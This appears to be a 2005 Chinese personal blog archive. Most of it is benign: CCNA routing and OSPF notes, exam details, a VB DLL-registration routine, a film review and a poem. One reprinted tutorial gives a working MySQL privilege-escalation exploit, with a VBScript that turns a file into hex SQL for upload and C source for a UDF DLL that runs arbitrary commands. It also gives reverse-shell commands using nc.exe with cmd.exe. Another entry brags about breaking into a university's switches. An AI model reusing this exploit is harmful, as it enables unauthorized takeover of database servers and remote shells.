1.2 路由选择协议

有类别路由选取择(classful routing)概述
不随各网络地址发送子网掩码信息的路由选择协议被称为有类别的选择协议(RIPv1、IGRP)
当采用有类别路由选择协议时,属于同一主类网络(A类、B类和C类)有所有子网络都必须使用同一子网掩码。运行有类别路由选择协议的路由选择协议的路由器将执行下面工作的一项以确定该路由型网络部分:
l如果路由更新信息是关于在接收接口上所配的同一主类网络的,路由器将采用配置在接口上的子网掩码;
l如果路由更新是关于在接收接口上所配的不同主类的网络的,路由器将根据其所属地址类别采用缺省的子网掩码。

有类别归纳路由的生成是由有类别路由选择协议自动处理的

无类别路由选择(classless routing)概述
无类别路由选择协议包括开放最短路径优先(OSPF)、EIGRP、RIPV2、中间系统到中间系统(IS-IS)和边界网关协议版本4(BGP4)。
在同一主类网络中使用不同的掩码长度被称为可变长度的子网掩码(VLSM)。无类别路由选择路由选择协议支持VLSM,因此可以更为有效的设置子网掩码,以满足不同子网对不同主机数目的需求,可以更充分的利用主机地址。

多数距离矢量型路由选择协议产生的定期的、例行的路由更新只传输到直接相连的路由设备。

在纯距离矢量型路由环境中,路由更新包括一个完整的路由表,通过接收相邻设备的全路由表,路由能够核查所有已知路由,然后根据所接收到的更新信息修改本地路由表。解决路由问题的距离矢量法有时被称为" 传闻路由(routing by rumor)"

CISCO IOS支持几种距离矢量型路由选择协议,凶手RIPv1、RIPv2和IGRP。CISCO也直持EIGRP,它是一种高级的距离矢量型路由选择协议。

路由选择协议通常与协议组的网络层关联

大多数距离矢量型路由选择协议采用贝乐曼-福特(Bellman-Ford)算法来计算路由。EIGRP是一种高级的距离矢量路由协议,它采用弥散修正算法(D UAL)

Cisco的IP距离矢量型路由选择协议的比较
特征RIPv1RIPv2IGRPEIGRP
计数到无限XXX
横向距离XXXX
抑制计时器XXX
触发式更新,路由反向 XXXX
负载均衡-等成本路径XXXX
负载均衡-非等成本路径XX
VLSM支持XX
路由算法贝尔曼-福特贝尔曼-福特贝尔曼-福特DUAL
度量值跳数跳数复合复合
跳数限制1515100100
易扩展性小小中大
注:IGRP和EIGRP的跳数限制缺省为100,但是可以配置到最大为255。

链路状态型路由选择协议只当网络拓朴结构发生变化时才生成路由更新数据包。当链路状态发生变化时,检测到这一变化的设备就生成一个关于该链路(路由)的链路状态通告(L SA)。随后LSA通过一个特殊的多目组播地址被传播给所有相邻设备。每台路由设备都会保留LSA拷贝,并向其相邻设备转发该LSA(这个过程变称为扩散f looding)然后更新其拓朴结构数据库(这是一个包含网络所有链路状态信息表)。LSA扩散被用于确保所有路由设备都能了解到这个变化,这样它们就能够更新它们的数据,并生成一个更新过的、反映新的网络拓朴结构的路由表。
Cisco的链路状态型路由选择协议的比较
特征OSPFIS-ISEIGRP
要求体系化拓朴结构XX
保留对所有可能路由的了解XXX
路由归纳-人工XXX
路由归纳-自动X
事件触发式通告XXX
负载均衡-等成本路径XXX
负载均衡-非等成本路径X
VLSM支持XXX
路由算法DijkstraIS-ISDUAL
度量值链路成本(带宽)链路成本(带宽)复合
跳数限制无1024100
易扩展性大很大大
各路由器中的路由进程都必须留有到各可能目的地逻辑网络的无环路单路径,当所有路由表都达到同步,且每个路由表都包含有到各目的地网络的一条可用路由时,网络就达到了收敛状态。收敛是在网络拓朴结构发生变化后,比如增加了新的路由或现有路由的状态发生了变化后,与路由表同步相关联的活动。
收敛时间是网络中所有路由对当前拓朴结构的认知达到一致所需的时间,网络的大小、所使用的路由选择协议以及众多可配置的计时器都能够影响收敛时间。

有两种检测的方法:
l当物理层或数据链路层没能接收到一定数量(通常是3)的连续keepalive消息时,就认为该链路失效。
l当路由选择协议没能接收到一定数量(通常是3)的连续Hello消息或路由更新或相类似消息时,就认为该链路失效了。

大多数路由选择协议都具有防止在链路状态转换过程中产生拓朴结构环路用的计时器。

第 二 章 扩 展 I P 地 址
Internet的发展快的令人难以置信。这种迅猛发展导致了地址方面的两大挑战:
lIP地址的耗尽
l路由表的增长和可管理性

IP寻址解决方案:
通过在IP地址中启用更多的分级层来减慢IP地址的消耗及减少Internet路由表条目的
量。这些解决方案包括:
l子网掩码
l私有网络的地址分配
l网络地址转换(NAT)
l体系化编址
l可变长度子网掩码(VLSM)
l路由归纳
l无类别域间路由(CIDR)

IP地址所属类别:
地址的第一字节(十进制)地址类别
1~126A类
128~191B类
192~223C类
224~239D类
240~255E类
D类地址还没有被广泛使用,它是多目组播地址;一些路由选择协议所使用的D类多目组播地址如下:
OSPF—–224.0.0.5和224.0.0.6
RIPv2—–224.0.0.9
EIGRP—-224.0.0.10

体系化编址:
体系化编址很像我们打电话一般,每个电话局并不需要知道全国的电话号码,你打电话如果第一位不是0的话总机就到自己的电话条目中找到链路然后接过, 如果是0,那么它就看是那个区号,比如是0791-6221155,它就把这信息传给南昌电话局(0791)由南昌话局找到6221155这链路并接通,这样自己的总机就不需要存有外地的话条目了, 让别人也有口饭吃吧J,原理同样可以用在路由器中.

体系化编址的优点:
l减少路由条目的数量
路由归纳是当我们采用了一种体系化编址规划后的一种用一个IP地址代表一组IP地址的集合的方法.通过对路由进行归纳,我们能够将路由表条目保持为可管理的, 而它可以带来以下益处:
——提高路由(转发)效率;
——当重新计算路由表或通过路由表条目检索一个匹配时,所需的CPU周期数减少了;
——降低了对路由器的内存需求
——在网络发生变化时可以更快的收敛
——容易排错
l有效的地址分配
体系化编址使我们能够利用所有可能的地址,因为我们的地址分组是连续的;

可变长度子网掩码 (VLSM)
VLSM提出供了在一个主类(A、B、C类)网络内包含多个子网掩码的能力,以及对一个子网的再进行子网划分的能力。它的优点如下:
l对IP地址更为有效的使用-如果不采用VLSM,公司将被限制为在一个A、B、C类网络号内只能使用一个子网掩码;
l就用路由归纳的能力更强-VLSM允许在编址计划中有更多的体系分层,因此可以在路由表内进行更好的路由归纳。

路由归纳
在大型互连网络中,存在着成百上千的网络。在这环境中,一般不希望路由器在它的路由表中保存所有的这些路由。路由归纳(也被子称为路由聚合或超网s upernetting)可以减少路由器必须保存的路由条目数量,因为它是在一个归纳地址中代表一系列网络号的一种方法。

在大型 、复杂的网络中使用路由归纳的另一个优点是它可以使其它路由器免受网络拓朴结构变化的影响。

只有在就用了一个正确的地址规划时,路由归纳才能可行和最有效,在子网环境中,当网络地址是以2的指数形式的连续区块时,路由归纳是最有效的。

路由选择协议根据共享网络地址部分来归纳或聚合路由。无类别路由选择协议—OSPF和EIGRP-支持基于子网地址,包括VLSM编者按址的路由归纳。有类别路由选择协议- RIPv1和IGRP-自动地在有类别网络的边界上归纳路由。有类别路由选择协议不支持在任何其它比特边界上的路由归纳,而无类别路由选择协议支持在任何比特边界上的路由归纳。
因为路由表的条目少了,路由归纳可以减少对路由器内存的占用,减少路由选择协议造成的网络流量。要使网络中的路由归纳能够正确的工作,必须满足下面要求:
l多个IP地址必须共享相同的高位比特;
l路由选择协议必须根据32比特的IP地址和高达32比特的前缀长度来作出路由转发决定
l路由更新必须将前缀长度(子网掩码)与32比特的IP地址一起传输。

Cisco路由器中路由归纳的*作
CISCO通过以下两种方法来管理路由归纳:
l发送路由归纳
l从路由归纳中选择路由

地址不连续的子网是指由其它不同的主类网络所分开的同一主类网络中的一些子网

路由选择协议对路由归纳的支持情况
协议是否在有类别网络边界自动归纳?能否关闭自动归纳是否能够在的类别网络边界之外进行归纳
RIPv1是否否
RIPv2是是否
IGRP是否
EIGRP是是是
OSPF否–是


无类别域间路由(CIDR)

CIDR是开发用于帮助减缓IP地址和路由表增大问题的一项技术。CIDR的理念是多个C类地址块可以被组合或聚合在一起生成更大的无类别I P地址集(也就是说允许有更多的主机)。成块的C类地址是分配给各个ISP的


在串行接口上使用无编号IP地址
要在不给接口分配一个明确IP地址的前提出下在串行接口上启用IP处理功能,可以使用 "ip unnumbered type number"接口配置命令。在该命令中"type number"是路由器上具有分配的IP地址的另一个接口(该接口被称为指定接口或参考接口,即无编号接口从其处借用IP地址的那个接口)的类型和编号。它不能是另一个无编号接口。如果要关闭串行接口中的I P处理功能,可心使用该命令的NO形式。

无编号接口的限制:
l使用HDLC、PPP、LAPB、SLIP协议的串行接口,以及隧道接口可以采用无编号方式。不能在X。25或交换式多兆位数据服务SMDS接口上使用无编号接口配置命令。
l我们不能使用PING命令来确定无编号接口是否已经UP了,因为该接口没有地址。SNMP可以远程监控该接口状态。
例子:
Interface Ethernet0 Ip address 10.1.1.1 255.255.255.0!interface Serial0 ip unnumbered Ethernet0


使用帮助地址(Helper Address)

路由器是不转达发广播的,帮助地址通过将这些广播数据包直接转发到目标服务器而帮助客户机和服务器建立联系。

帮助地址命令将广播性目的地地址改变为单点传达室送地址(或一个定向的广播-在某个子网内的本广播),使该广播消息可以被路由到一个具体的目的地而不是所有地方

使用"ip helper-address address"接口配置命令配置一个可能会接收到广播的接口。在该命令中"ADDRESS"是指在转发用户数据报协议(UDP)广播时所使用的目的地地址。该指定地址可以是远程服务器的单点传送地址或定向广播地址。

如果定义了"ip helper-address address"命令,为8个缺省UDP端口进行转发的功能就被自动启用,它们是:TFTP(69)、DNS(53)、时间(37)、NETBIOS服务(137)、N ETBIOS数据报服务(138)、BOOTP服务器(67)、BOOTP客户机(68)和终端访问控制器访问控制系统TACACS(49)。
如果定义了"ip helper-address address"命 令 和 指 定 了 这 8 个 U D P端 口 的"ip forward-protocol udp"命令,那么寻址这8个UDP端口的广播数据包将被自动转发。

"ip forward-protocol"描述:
"ip forward-protocol"命令描述
udpUDP-传输层协议
port(任选)当指定了"udp"关键字时,可以定义UDP目的地端口号或端口名
nd网络磁盘;无盘Sun工作站使用的一种老的协议
sdns网络安全协议

实例:
Interface Ethernet 0 Ip address 172.16.1.100 255.255.255.0 Ip helper-address 172.16.2.2!ip forward-protocol udp 3000no ip forward-protocol udp tftp

"ip helper-address"命令必须被配置在接收到最初客户广播数据包的路由器接口上。


第 三 章 在 单 个 区 域 办 配 置OSPF
OSPF是一项链路状态型技术,比如路由选择信息协议(RIP)这样的距离矢量型技术相对。OSPF协议完成各路由选择协议算法的两大功能:路径选择和路径交换。

OSPF是一种内部网关协议(IGP),也就是说它在属于同一自治系统的路由器间发布路由信息。

OSPF是为解决RIP不能解决的大型、可扩展的网络需求而写的OSPF解决了以下问题:
l收敛速率
l对可变长度掩码(VLSM)的支持
OSPF、RIPV2支持VLSM,RIP只支持固定长度子网掩码(FLSM)
l网络可达性
RIP跨度达16跳时被认为是不可达,OSPF理论上没有可达性限制
l带宽占用
RIP每隔30秒广播一次完整路由,OSPF只有链路发生变化才更新
l路径选择方法
RIP是基于跳数选择最佳路径的,OSPF采用一种路径成本(cost)值(对于Cisco路由器它基于连接速率)作为路径选择的依据。OSPF与RI P、IGRP一样直持等开销路径

OSPF信息在IP数据包内,使用协议号89
OSPF可以运行在广播型网络或非广播型网络上


在广播型多路访问拓朴结构中的OSPF运行

Hello协议负责建立和维护邻居关系
通过IP多目组广播224.0.0.5,也被称为ALLSPFROUTER (所有SPF路由器)地址,Hello数据包被定期地从参与OSPF的各个接口发送出去。

Hello数据包中所包含的信息如下:
l路由器ID
这个32比特的数字在一个自治系统内唯一的标识一个路由器。它缺省是选用活跃接口上的最高IP地址。这个标识在建立邻居关系和直辖市运行在网络中S PF算法拷贝的消息时是很重要的。
lHELLO间隔和DOWN机判断间隔(dead interval)
HELLO间隔规定了路由发送HELLO的时间间隔(秒)。DOWN机判定间隔是路由器在认为相邻路由器失效之前等待接收来自邻居消息的时间,单位为秒,缺省是H ELLO间隔的4倍。
l邻居
这些是已经建立了双向通信关系的相邻路由器
l区域ID
要能进行通信,两台路由器必须共享一个共同的网络分段
l路由器优先级
这8个比特数字指明了在选择DR和BDR时这台路由器的优先级。
lDR和BDR的IP地址
l认证口令
l未节(stb)区域标志


OSPF数据包头中的各个域:
l版本号 1(字节数)
l类型 1
HELLO
链路状态请求
链路状态更新
链路状态确认
l数据包长度 2
l路由器ID 4
l区域ID 4
l校验和 2
l认证类型 2
l认证 8
l数据 可变的


指定路由器DR和备用指定路由器BDR
在一个以太网分段这样的多路访问环境中的路由器必须选举一个DR和BDR来代表这个网络。在DR运行时,BDR不执行任何DR功能。但它会接收所有信息,只是不做处理而已,由D R完成转发和同步的任务。BDR只有当DR失效时才承担DR的工作,

DR和BDR的价值:
l减少路由更新数据流
DR和BDR为给定多路访问网络上的链路状态信息交换起着中心点的作用。每台路由器都有必须建立与DR和BDR的毗邻关系,DR向多路访问网中的所有其它路由器发送各路由的链路状态信息。这一扩散过程大大减少了网络分段上与路由器相关的数据流。
l管理链路状态同步
DR和BDR可保证网络上的其它路由器都有有关于网络的相同链路状态信息
毗邻关系是存在于路由器与其DR和BDR之间的关系。毗邻的路由器将具有同步的链路状态数据库

2005年07月20日

        很早的片了,不过那时候只是看了介绍而已,没有什么感触,而后却也没什么机会去看她。今天终于有机会看了一遍。

        看完电影,我发现我的眼睛竟然有些许湿润,实在是惊讶不已。我似乎很久没有被感动了。其实电影只是一部人神相恋的简单故事。如果是国内的人来拍,她就成了什么龙女啊,牛郎织女啊,或者七仙女的故事啦;如果在安徒生童话里,她也许就是人鱼与王子的故事。然而后几者却是很难感动我——尽管他们都是悲剧结尾,尽管他们都是跨越距离的爱情。为什么这么说?

       我不知道如何去描述我的感受,但我知道我被玛姬片头所表现的那种极其强烈的责任感所打动;我被塞斯不论玛姬的过去甚至现在如何,也愿意付出永生的代价,去追寻那瞬间的爱情所感动;我也被片尾塞斯在承受失去爱人的痛苦后勇敢面对新的人生所激励。

       打动我的,感动我的,激励我的,这些都是那么真实,却又似乎离我那么的遥远。我似乎从来没有这些东西,又似乎一直封印着这些东西?到底是什么,我想现在我不用去找那个答案了。

       我似乎有了自己的方向,不,不是似乎,是真的有了自己的方向。

       最后,我想我应该对Nicolas Cage ,Meg Ryan ,Brad Silberling 致谢!      

◆考试时间:90分钟。

  ◆考试题量:56道试题。

  ◆考试题型:3道路由模拟题;少数连线题;多数多项选择题及其它形式的题型。

  ◆考试内容:Planning & Designing、Implementation & Operation、Troubleshooting及Technology。即:网络设计规划、网络搭建作业、网络故障处理、网络技术要点这四项。

  1、网络设计规划:应用思科网络技术搭建一个简单的网络

           规划IP寻址方案,分析设计需求

           基于用户需求选择适当的路由协议

           应用思科网络技术搭建一个简单的接入网络

           基于用户需求配置适当的访问控制列表

           基于用户需求选择适当的广域网服务


  2、网络搭建作业:根据用户需求,配置适当路由协议

           在路由器和主机上配置IP地址,子网掩码,网关地址

           配置路由器附带管理功能

           在交换机上配置VLAN及交换机间通信

           操作实现局域网

           在特定的网络环境下配置交换机

           管理操作系统及设备配置文件

           执行路由器初始化配置

           执行交换初始化配置

           实现访问控制列表

           实现简单的广域网协议

  3、网络故障处理:利用OSI 7层模型知识知道解决网络故障问题

           完成局域网及虚拟局域网故障处理

           解决路由协议问题

           解决IP地址及主要配置问题

           解决运转网络的设备故障问题

           解决访问控制列表引起的故障问题

           执行简单的广域网故障处理

  4、网络技术要点:用OSI分层模型描述网络通信

           描述生成树协议的处理过程

           比较对照个中局域网环境的主要特性

           评估路由协议特征

           评估TCP/IP协议通信处理过程及相关协议组

           描述网络设备组件特性

           评估TCP/IP协议通信处理过程及相关协议组

           评估网络设备组件特性

           评估数据包处理规则

           评估广域网关键特性

  思科互联网学习解决小组(Internet Learning Solutions Gruop)负责人介绍:新推出的CCNA 640-801考试内容新增CCNP知识点,包括:OSPF、EIGRP、可变长度子网掩码(Variable length subnet masking)及高级变换技术配置。此次升级考试并不是缩小考试范围,它的广度和深度比640-607增加不少。
 

2005年07月19日

文章已发表于《黑客X档案》7月刊,作者:dugu

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!

首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。

思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!

下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):

set @a = concat(”,0×0123abc1312389…..);

set @a = concat(@a,0×4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob

insert into Mix values("");update Mix set data = @a;//@a插入表Mix

select data from Mix into DUMPFILE ‘C:\\Winnt\\文件名‘;//导出表中内容为文件

前两句很熟悉把,这个就是我们以前注入的时候,绕过的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。

后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:

fp=wscript.arguments(0)

fn=right(fp,len(fp)-instrrev(fp,"\"))

with createobject("adodb.stream")

.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat(”,0x"

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt<16 then .write "0"

.write hex(bt)

if i mod 128=0 then .write ");"+vbcrlf+"set @a = concat(@a,0x"

next

end with

好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set @a = concat(”,0x”删除了,加上建表,插值得那三句代码即可!

脚本生成了,如何上传?先登陆mysql服务器:

C:\>mysql –u root –h hostip –p

Mysql>use mysql; //先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库

Mysql>\. E:\*.dll.txt; //这儿就是你生成的mysql脚本

按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!

下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!

先用mix.dll:

登陆mysql,输入命令:

Mysql> \. e:\mix.dll.txt;

Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME ‘C:\\windows\\mix.dll’;

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!

Mysql> select Mixconnect(‘你的ip’,'8080′); //填写你的反弹ip和端口

过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1

这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select Mixconnect(‘你的ip’,'8080′);”的时候,对方的mysql会当掉!报错,然后服务停止!如图2

所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。

再用my_udf.dll

Mysql>\. C:\my_udf.dll.txt

Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME ‘C:\\winnt\\my_udf.dll’;

    //同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数

Mysql> select my_udfdoor(‘’); //这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数

好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:

D:\>nc hostip 3306

*

4.0.*-nt x$Eo~MCG fuck //看到这个后,输入“fuck ,他是my_udfdoor默认密码,自己无法更改

过一会儿,你就有了系统权限的shell了,如图3

由于他是hook recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select my_udfdoor(‘’);”后),不管你是否连接,只要执行了:

Mysql>drop function my_udfdoor; 后,mysql也汇报错,然后挂掉,如图4

所以,你使用这个dll文件无法删除你的痕迹!

最后,然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql udf的示例作模版即可!看他的示例:

#include <stdlib.h>

#include <winsock.h>

#include <mysql.h>

extern "C" {

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

       char *error);

// 兼容C

}

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

       char *error)

{

    char * me = "my name";

    return me;

    // 调用此UDF将返回 my name

}

十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:

下面是我的一个哥们Crackme是修改的:

#include <stdlib.h>

#include <windows.h>

#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改

 

 

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改!

{

    char me[256] = {0};

if (args->arg_count == 1){

        strncpy(me,args->args[0],args->lengths[0]);

        me[args->lengths[0]]=’\0′;

        WinExec(me,SW_HIDE); //就是用它来执行任意命令

}else

        strcpy(me,"do nonthing.\n");

 

 

    return me;

}

好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!

看操作:

Mysql>\. C:\sysudf.dll.txt

Mysql>Create function sys_name returns string soname ‘C:\\windows\\sysudf.dll’;

Mysql>\. Nc.exe.txt //nc.exe也上传上去

Mysql>select sys_name(‘nc.exe -e cmd.exe 我的ip 8080′);

//sys_name参数只有一个,参数指定要执行的系统命令

好,看看在Win2003中的一个反弹shell了,如图5

当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?

       本来很早就知道了吉大的好些服务器都有很严重的安全问题,不论是windows还是*nix都是问题多多。但想想这个问题并不完全是网络中心的问题,毕竟他们不可能为每一台服务器去配置。

        然而,以我最近刚刚培训完CCNA的能力,我今天竟然轻松的进入了吉大的十几台交换机。我是初学这些设备,不会太多的操作,但我想让某栋楼断断网总是做得到的,稍微有点技术的,做跳板也可以吧?想想吧,一个初学者就能轻松进入吉大的这么多设备,如果是恶意的攻击者,后果如何?

        吉大的网络工作者们,我知道维持吉大这么大的网络,的确十分费神,但是既然你们是选择了这个工作,请履行你们的义务,给吉大师生们一个安全有保障的网络环境吧!

2005年07月16日

破解所谓的"网页源代码加密"
在地址栏或按Ctrl+O,输入:

javascript:s=document.documentElement.outerHTML;document.write(‘<body></body>’);document.body.innerText=s;

源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。

2005年07月15日

如何进行dll注册与删除??????????



regsvr32 dllname.dll
regsvr32/u dllname.dll



up



Function RegisterDll(strDllFileName As String, strProgID As String, strClsID As String, Optional bVerify As Boolean = True) As Long
‘ 函数说明
‘     注册 ActiveX DLL。
‘     注册校验:如果 strProgID 不为空,则注册后检查 strProgID 对应的 CLSID 是否与 strCLSID 相等,
‘     如不相等,则认为未注册成功。

‘ 参数说明
‘     strDllFileName    :(in) DLL 文件名,包括路径
‘     strProgID         :(in) ProgID,如 "AutoYuanjuanProject.AutoYuejuan"
‘     strCLSID          :(in) CLSID,如 "37048527-7337-43A8-A041-18DDA083F9F3"
‘     bVerify           :(in) 是否校验注册成功,默认为是

‘ 返回值
‘     0 = 正常
‘     1 = 程序运行错误

‘ 算法或程序流程
‘     1. regsvr32 /s /u .dll
‘     2. regsvr32 /s .dll
‘     3. CLSIDFromProgID
‘     4. StringFromCLSID
‘     5. CLSID 的 String 与 strCLSID 比较,如果相同,说明注册成功
   Dim strSystemPath       As String
   Dim strRegsvr32         As String
   Dim strCmdLine          As String
   Dim lnProcess           As Long
   Dim lnProcessID         As Long
   Dim lnExitCode          As Long
   Dim sgStartTimer        As Single
   Dim tClsID              As tp_GUID
   Dim pOLESTR             As Long
   Dim strNewClsID         As String
   Dim lnReturn            As Long
   Dim ln1                 As Long
   
   On Error GoTo err_RegisterDll
   
   ’ 取得系统路径
   strSystemPath = String(MAX_PATH, Chr(0))
   lnReturn = GetSystemDirectory(strSystemPath, MAX_PATH)
   If lnReturn > 0 Then
      strSystemPath = Left(strSystemPath, lnReturn)
   Else
      ’ 取得系统路径失败
      RegisterDll = 1
      Exit Function
   End If
   If Right(strSystemPath, 1) <> "\" Then strSystemPath = strSystemPath & "\"
   
   ’ 计算 regsvr32.exe 的文件名
   strRegsvr32 = strSystemPath & "regsvr32.exe"
   
   ’ 注册 DLL
   ’strCmdLine = strRegsvr32 & " /s " & strDllFileName
   strCmdLine = strRegsvr32 & " /s """ & strDllFileName & """"
   lnProcessID = Shell(strCmdLine, vbNormalFocus)
   If lnProcessID = 0 Then
      ’ 运行失败
      RegisterDll = 1
      Exit Function
   End If
   
   lnProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, lnProcessID)
   If lnProcess <> 0 Then
      sgStartTimer = Timer
      Do
          Call GetExitCodeProcess(lnProcess, lnExitCode)
          DoEvents
          DoEvents
          DoEvents
      Loop While (lnExitCode = STATUS_PENDING) And (Timer - sgStartTimer < 5)    ’ 5 秒超时
      CloseHandle lnProcess
      If lnExitCode = STATUS_PENDING Then
         ’ regsvr32 运行超时
         RegisterDll = 1
         Exit Function
      End If
   End If
      
   ’ 校验注册结果
   If Not bVerify Then
      RegisterDll = 0
      Exit Function
   Else
      ’ 计算 CLSIDFromProgID
      If strProgID = "" Then
         ’ 不进行 ProgID 与 CLSID 的校验
         RegisterDll = 0
         Exit Function
      End If
      lnReturn = CLSIDFromProgID(StrPtr(strProgID), tClsID)
      If lnReturn <> 0 Then
         ’ 运行失败
         RegisterDll = 1
         Exit Function
      End If
      
      ’ 计算 StringFromCLSID
      strNewClsID = String(160, Chr(0))
      lnReturn = StringFromCLSID(tClsID, pOLESTR)
      If lnReturn <> 0 Then
         ’ 运行失败
         RegisterDll = 1
         Exit Function
      End If
      If GetComString(pOLESTR, 100, strNewClsID) <> 0 Then
         ’ 运行失败
         CoTaskMemFree pOLESTR
         RegisterDll = 1
         Exit Function
      End If
      CoTaskMemFree pOLESTR
      
      ’ CLSID 的 String 与 strCLSID 比较,如果相同,说明注册成功
      If strNewClsID = strClsID Then
         RegisterDll = 0
         Exit Function
      Else
         RegisterDll = 1
         Exit Function
      End If
   End If
   
err_RegisterDll:
      
   RegisterDll = 1
   
‘debug
‘MsgBox "err_RegisterDll"
‘Err.Clear
‘On Error GoTo err_RegisterDll
‘Resume Next
End Function
Function UnRegisterDll(strDllFileName As String) As Long
‘ 函数说明
‘     注销 ActiveX DLL

‘ 参数说明
‘     strDllFileName    :(in) DLL 文件名,包括路径

‘ 返回值
‘     0 = 正常
‘     1 = 程序运行错误

‘ 算法或程序流程
‘     1 regsvr32 /s /u .dll
   Dim strSystemPath       As String
   Dim strRegsvr32         As String
   Dim strCmdLine          As String
   Dim lnReturn            As Long
   Dim lnProcessID         As Long
   
   On Error GoTo err_UnRegisterDll
   
   ’ 取得系统路径
   strSystemPath = String(MAX_PATH, Chr(0))
   lnReturn = GetSystemDirectory(strSystemPath, MAX_PATH)
   If lnReturn > 0 Then
      strSystemPath = Left(strSystemPath, lnReturn)
   Else
      ’ 取得系统路径失败
      UnRegisterDll = 1
      Exit Function
   End If
   If Right(strSystemPath, 1) <> "\" Then strSystemPath = strSystemPath & "\"
   
   ’ 计算 regsvr32.exe 的文件名
   strRegsvr32 = strSystemPath & "regsvr32.exe"
   
   ’ 注销 DLL
   strCmdLine = strRegsvr32 & " /s /u " & strDllFileName
   lnProcessID = Shell(strCmdLine, vbNormalFocus)
   If lnProcessID = 0 Then
      ’ 运行失败
      UnRegisterDll = 1
      Exit Function
   End If
      
   UnRegisterDll = 0
   Exit Function
   
err_UnRegisterDll:
   UnRegisterDll = 1
   
End Function

2005年07月14日

男人尊敬女人,是因为女人十月怀胎撕裂肉体的疼痛才有了男人的生命……

男人疼爱女人,是因为女人十月怀胎撕裂肉体的疼痛又让男人的生命再一次延续….

女人尊敬女人,是因为女人也会十月怀胎撕裂肉体成为母亲….

女人疼爱女人,是因为女人才会理解与感知女人…

而维系这一切的便是母爱….无私至上的情感,

眼泪在你面前已无声,文字在你面前已无力….

爱你,妈妈…..